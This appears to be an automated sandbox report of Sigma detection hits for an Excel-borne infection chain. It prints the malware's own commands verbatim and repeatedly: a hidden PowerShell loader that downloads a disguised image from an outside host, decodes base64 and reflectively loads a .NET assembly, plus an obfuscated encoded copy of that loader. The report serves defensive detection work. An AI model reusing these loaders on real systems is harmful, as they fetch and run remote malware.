('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49173, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 198.46.177.156, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3220, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49174
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1440, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" , ProcessId: 3220, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1440, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" , ProcessId: 3220, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.241.153.192, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1440, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rugtucw, CommandLine: C:\Users\user\AppData\Roaming\rugtucw, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rugtucw, NewProcessName: C:\Users\user\AppData\Roaming\rugtucw, OriginalFileName: C:\Users\user\AppData\Roaming\rugtucw, ParentCommandLine: taskeng.exe {3AFD0624-861F-4A6A-8994-E838F818ED19} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1], ParentImage: C:\Windows\System32\taskeng.exe, ParentProcessId: 3784, ParentProcessName: taskeng.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\rugtucw, ProcessId: 3820, ProcessName: rugtucw
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3220, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49174
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1440, Protocol: tcp, SourceIp: 54.241.153.192, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1440, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" , ProcessId: 3220, ProcessName: wscript.exe
